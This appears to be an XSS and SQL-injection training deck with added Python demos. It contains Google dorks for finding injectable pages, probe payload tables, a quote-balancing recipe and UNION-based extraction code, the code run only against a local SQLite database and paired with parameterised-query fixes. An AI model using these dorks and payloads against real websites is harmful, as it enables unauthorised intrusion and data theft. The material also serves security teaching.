
Hacking Web

Cross Site Scripting and SQL Injection


Theory

Course outline:

Risks

Prerequisites
How it works
Some attacks
Examples
Attack vectors
WAF bypass
Dorks

Cross Site Scripting (XSS) and SQL Injection

<script>alert(1);</script>

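The `<script>alert(1);</script>` line above is the probe a tester reflects through a search parameter to see whether the page echoes it unencoded. The following is an added example, not code from the deck: a hypothetical search page rendered three ways (unencoded, HTML-entity encoded, and a JavaScript-string variant) together with the check that tells you whether the probe survived. The page templates, the second probe and the function names are assumptions made for the illustration; the point it adds is that the correct encoder depends on the context the value lands in.

```python
import html
import json

# Constructed probe payloads. The first is the deck's own XSS probe; the second is a
# breakout probe for the JavaScript-string context (assumed for this example).
XSS_PROBE = "<script>alert(1);</script>"
SCRIPT_BREAKOUT = "</script><script>alert(1);</script>"


def render_body_vulnerable(q: str) -> str:
    """Hypothetical search page that reflects the term into HTML body context unencoded."""
    return f"<p>Results for: {q}</p>"


def render_body_escaped(q: str) -> str:
    """Same page with HTML entity encoding: the right encoder for body and attribute context."""
    return f"<p>Results for: {html.escape(q, quote=True)}</p>"


def render_js_backslash_escaped(q: str) -> str:
    """Reflection into a JavaScript string with only backslash-escaping of quotes.

    This stops  ";alert(1);//  but not a literal </script>: the HTML parser closes the
    script element before JavaScript ever sees the string.
    """
    escaped = q.replace("\\", "\\\\").replace('"', '\\"')
    return '<script>var q = "' + escaped + '";</script>'


def render_js_json_escaped(q: str) -> str:
    """JS string context done properly: JSON-encode, then hex-escape '<' so the HTML
    parser cannot find a closing </script> inside the literal."""
    encoded = json.dumps(q).replace("<", "\\u003c")
    return "<script>var q = " + encoded + ";</script>"


def reflects_unencoded(page: str, probe: str) -> bool:
    """The tester's check: does the raw probe survive verbatim in the response?"""
    return probe in page


if __name__ == "__main__":
    for name, render in [("body/unencoded", render_body_vulnerable),
                         ("body/html.escape", render_body_escaped),
                         ("js/backslash", render_js_backslash_escaped),
                         ("js/json", render_js_json_escaped)]:
        for probe in (XSS_PROBE, SCRIPT_BREAKOUT):
            print(f"{name:18s} {probe!r:40s} reflected={reflects_unencoded(render(probe), probe)}")
```

Run it and the two JavaScript rows show the caveat: the backslash-only encoder keeps `";alert(1);//` harmless but lets `</script>` through, while the JSON encoder with `<` escaped handles both.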

inurl:search.php?
inurl:find.php?
inurl:search.html
inurl:find.html
inurl:search.aspx
inurl:find.aspx

DORKS

DATABASE

DB servers,
MySQL(Open source),
MSSQL,
MS-ACCESS,
Oracle,
PostgreSQL (open source),
SQLite

SQL
SQL stands for Structured Query Language. It is the
language used to communicate with the database;
because we use it to query the database, it is
called a query language.

What is SQL Injection?

SQL injection is a common and well-known hacking
method today. Some beginners think it is a small
thing because of automated tools such as "Havij".

Example of a database


BASIC QUERIES
select * from table1
select column1,column2 from table1
------------------------------------------------------BASIC CONDITIONS TO
LIMIT THE OUTPUT
Select * from students where id=1
Select * from students where
f_name='camaline'


If the query takes a numeric input


select * from table_name where id=1
select * from table_name where id='1'
select * from table_name where id="1"
select * from table_name where id=(1)
select * from table_name where id=('1')
select * from table_name where id=("1")

If the query takes a string input


select * from table_name where id='1'
select * from table_name where id="1"
select * from table_name where id=('1')
select * from table_name where id=("1")

http://pageweb.com/report.php?id=23

select * from table_name where id=23


select * from table_name where id='23'
select * from table_name where id="23"
select * from table_name where id=(23)
select * from table_name where id=('23')
select * from table_name where id=("23")
BEFORE CHECKING THE TYPE OF QUERY BEING MADE,
NOTE THE COMMENT STYLES USED TO DISCARD THE REST OF THE QUERY.
-- followed by a space : MySQL only treats -- as a comment when whitespace follows the two dashes
--+ : the same comment written for a URL, where + decodes to a space on the server
# : MySQL hash comment; it must be URL-encoded as %23, because a bare # starts the URL fragment and never reaches the server

select * from table_name where id=23



Input : Reaction if it is an integer-based injection

23' : should cause an error or no output
23" : should cause an error or no output
23 or 1=1 : output should come, but it may differ (1=1 is true for every row)
23 and 1=1 : same output
23 and false : no output
23 and true : same output
23--+ : same output (--+ is used as the comment here; the comment styles above show which one to use)
23 and true--+ : same output

select * from table_name where id='23'

Input : Reaction if it is a single-quote based injection

23' : should cause an error or no output
23" : no error, same output
23' or '1'='1 : output should come, but it may differ
23' and '1'='1 : same output
23' and false--+ : no output
23' and true--+ : same output

select * from table_name where id="23"

Input : Reaction if it is a double-quote based injection

23' : no error, same output
23" : should cause an error or no output
23" or "1"="1 : output should come, but it may differ
23" and "1"="1 : same output
23" and false--+ : no output
23" and true--+ : same output

select * from table_name where id=(23)



Input : Reaction if it is an integer-based, bracket-enclosed injection

23' : should cause an error or no output
23" : should cause an error or no output
23 or 1=1 : output should come, but it may differ (inside the brackets the whole expression 23 or 1=1 evaluates to 1, so the row with id=1 is returned)
23 and 1=1 : output should come, but it may differ (same reason: 23 and 1=1 evaluates to 1)
23 and false : no output (23 and false evaluates to 0)
23 and true : output should come, but it may differ (23 and true evaluates to 1, so id=1 is matched rather than id=23)
23--+ : error or no output; the comment swallows the closing bracket, which tells you the input is enclosed in brackets

select * from table_name where id=('23')

Input : Reaction if it is a bracket-enclosed, single-quote based injection

23' : should cause an error or no output
23" : no error, same output
23' or '1'='1 : output should come, but it may differ
23' and '1'='1 : output should come, but it may differ
23' and false--+ : no output or error (the comment also removes the closing bracket)
23' and true--+ : no output or error
23') and false--+ : no output
23') and true--+ : same output

select * from table_name where id=("23")



Input : Reaction if it is a bracket-enclosed, double-quote based injection

23' : no error, same output
23" : error or no output
23" or "1"="1 : output should come, but it may differ
23" and "1"="1 : output should come, but it may differ
23" and false--+ : no output or error (the comment also removes the closing bracket)
23" and true--+ : no output or error
23") and false--+ : no output
23") and true--+ : same output

THREE BASIC RULES OF INJECTION

[1]. Balance: close the quote or bracket the input sits in.
[2]. Inject: add the SQL you want to run.
[3]. Commenting: comment out whatever the original query has after the input.

Select * from tablename where id='<input>'

"http://fakesite.com/report.php?id=23' order by 1--+"
So we inject in the place of <input>:
Select * from tablename where id='23' order by 1--+'
(23' balances the open quote, order by 1 is the injected SQL, and --+ comments out the trailing quote)
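The reaction tables above, the comment styles, and the three rules all describe one mechanical question: after the parameter is spliced into the query, are the quotes and brackets balanced, did a comment take effect, and did any of the input land outside a string literal? The following is an added example, not code from the deck, that answers that question for the six query shapes used in the slides. It is a small scanner that models MySQL's quoting and `-- `/`#` comment rules rather than a real database, so it does not evaluate expressions such as `(23 and true)`; the URL it decodes is the deck's own fake URL, and the template names and status labels are assumptions made for the illustration.

```python
from urllib.parse import parse_qs, urlsplit

# The six query shapes from the slides; {} marks where the request parameter lands.
TEMPLATES = {
    "int":            "select * from table_name where id={}",
    "single":         "select * from table_name where id='{}'",
    "double":         'select * from table_name where id="{}"',
    "int_bracket":    "select * from table_name where id=({})",
    "single_bracket": "select * from table_name where id=('{}')",
    "double_bracket": 'select * from table_name where id=("{}")',
}


def payload_from_url(url: str, param: str = "id") -> str:
    """Decode the parameter the way the server sees it: '+' becomes a space, so '--+'
    arrives as '-- ' (a valid MySQL comment). A bare '#' is a URL fragment and never
    reaches the server, which is why it has to be sent as %23."""
    return parse_qs(urlsplit(url).query, keep_blank_values=True).get(param, [""])[0]


def analyse(template: str, payload: str) -> dict:
    """Splice the payload into the template and scan the result for three things only:
    string-literal state, parenthesis depth, and the point where a '-- ' or '#'
    comment outside any literal discards the rest (modelled on MySQL's rules)."""
    start = template.index("{}")
    sql = template.replace("{}", payload, 1)
    end = start + len(payload)
    quote = None         # delimiter of the literal we are inside, or None
    depth = 0            # unclosed parentheses
    reaches_sql = False  # did any payload character land outside a literal?
    cut = len(sql)
    for i, c in enumerate(sql):
        if quote:
            if c == quote:
                quote = None
            continue
        if c == "#" or (sql.startswith("--", i) and i + 2 < len(sql) and sql[i + 2].isspace()):
            cut = i
            break
        if c in ("'", '"'):
            quote = c
        elif c == "(":
            depth += 1
        elif c == ")":
            depth -= 1
        if start <= i < end and c not in ("'", '"'):
            reaches_sql = True
    balanced = quote is None and depth == 0
    if not balanced:
        status = "error"   # unbalanced quote or bracket: error or empty page
    elif reaches_sql:
        status = "sql"     # payload is parsed as SQL: the injection landed
    else:
        status = "data"    # payload stayed inside the literal: same page as normal
    return {"statement": sql[:cut].rstrip(), "balanced": balanced, "status": status}


def probe_matrix(payloads):
    """Run every probe against every query shape; compare with the reaction tables."""
    return {p: {name: analyse(t, p)["status"] for name, t in TEMPLATES.items()} for p in payloads}


if __name__ == "__main__":
    payload = payload_from_url("http://fakesite.com/report.php?id=23'+order+by+1--+")
    for name, result in ((n, analyse(t, payload)) for n, t in TEMPLATES.items()):
        print(f"{name:15s} {result['status']:6s} {result['statement']}")
    for probe, row in probe_matrix(["23'", '23"', "23 and 1=1", "23') and true-- "]).items():
        print(f"{probe!r:22s}", row)
```

Reading the matrix column by column reproduces the tables: `23'` is "data" only for the double-quote shapes and "error" for the rest, `23--+` breaks the bracket shapes, and `23') and true--+` is the one probe that lands cleanly in `id=('23')`.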

HOW AND WHY TO FIND THE NUMBER OF COLUMNS

UNION only works when both SELECTs return the same number of columns, so before injecting a UNION you have to find out how many columns the original query returns.

Select f_name,l_name from students where id=1

UNION statement
Select f_name,l_name from students where id=1 union select f_name,l_name from students where id=2


Select f_name,l_name from students where id=1 union select 1,2

f_name    l_name
Emily     watson
1         2

Select f_name,l_name from students where id=1 union select 'hello','bye'

f_name    l_name
Emily     watson
hello     bye

Select f_name,l_name from students where id=1 union select database(),user()

f_name    l_name
Emily     watson
fakedb1   fakeuser@localhost

Select * from students where id=1 union select f_name,l_name from students where id=2
(this one fails: the left side returns all four columns of students and the right side only two, and UNION requires the same number of columns on both sides)

ORDER BY

Query : Output
select * from students order by 1 : outputs all the rows sorted by the first column, which is id
select * from students order by 2 : outputs all the rows sorted by the second column, which is f_name
select * from students order by 3 : outputs all the rows sorted by the third column, which is l_name
select * from students order by 4 : outputs all the rows sorted by the fourth column, which is roll_no
Ordering by 5 would fail, because students has only four columns. That is what makes ORDER BY useful for counting columns: increase the number until the query errors, and the last one that worked is the column count the UNION has to match.
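The ORDER BY and UNION material above, run end to end against a real engine, as an added example that is not part of the deck. It uses Python's built-in SQLite in place of MySQL, so `sqlite_version()` and the `sqlite_master` table stand in for `database()`/`user()` and the information schema; the students rows are constructed to match the four-column table the slides describe, and the function names are assumptions made for the example. The parameterised lookup at the end is the fix: the same payload bound as data matches nothing.

```python
import sqlite3

# Constructed sample data in the shape of the deck's students table
# (id, f_name, l_name, roll_no). SQLite stands in for MySQL here.
ROWS = [
    (1, "Emily", "watson", 101),
    (2, "Camaline", "smith", 102),
    (23, "Arun", "kumar", 123),
]


def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("create table students (id integer, f_name text, l_name text, roll_no integer)")
    con.executemany("insert into students values (?,?,?,?)", ROWS)
    return con


def vulnerable_lookup(con, user_input: str):
    """The report.php?id= pattern from the slides: the parameter is glued into the SQL."""
    return con.execute("select * from students where id=" + user_input).fetchall()


def safe_lookup(con, user_input: str):
    """Parameterised equivalent: the value is bound as data, so it can never become SQL."""
    return con.execute("select * from students where id=?", (user_input,)).fetchall()


def is_error(con, payload: str) -> bool:
    """The 'error or no output' reaction from the probe tables, reduced to a boolean."""
    try:
        vulnerable_lookup(con, payload)
    except sqlite3.Error:
        return True
    return False


def count_columns(con, limit: int = 20) -> int:
    """ORDER BY n is accepted while n <= column count and fails at n+1, so the last n
    that worked is the number of columns the injectable SELECT returns."""
    found = 0
    for n in range(1, limit + 1):
        if is_error(con, f"1 order by {n}-- "):
            break
        found = n
    return found


def union_extract(con, ncols: int, expr: str):
    """Return the value of an arbitrary SQL expression through a UNION row. id=0
    matches no real row, so the only row that comes back is ours; the remaining
    columns are padded with numbers, as the slides do with 'union select 1,2'."""
    padding = "".join(f",{i}" for i in range(2, ncols + 1))
    rows = vulnerable_lookup(con, f"0 union select {expr}{padding}-- ")
    return rows[0][0]


if __name__ == "__main__":
    con = make_db()
    n = count_columns(con)
    print("columns:", n)
    print("engine version:", union_extract(con, n, "sqlite_version()"))
    print("first table:", union_extract(con, n, "(select name from sqlite_master where type='table' limit 1)"))
    print("same payload, parameterised:", safe_lookup(con, "0 union select 1,2,3,4-- "))
```

Against MySQL the extraction expressions would be `database()`, `user()` and a subquery on `information_schema.tables`; the column-counting loop is the same.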

XPATH-Error-Based-Injection-Extractvalue
XPATH-Error-Based-Injection-UpdateXML
Error-Based-Injection-Subquery-Injection
Blind-SQL-Injection
bypass-login-using-sql-injection
Dump-database-from-login-form-sql
time-based-blind-injection
insert-query-injection
group-by-and-order-by-sql-injection
Union-based-Oracle-Injection

Dorks

inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:pageid=
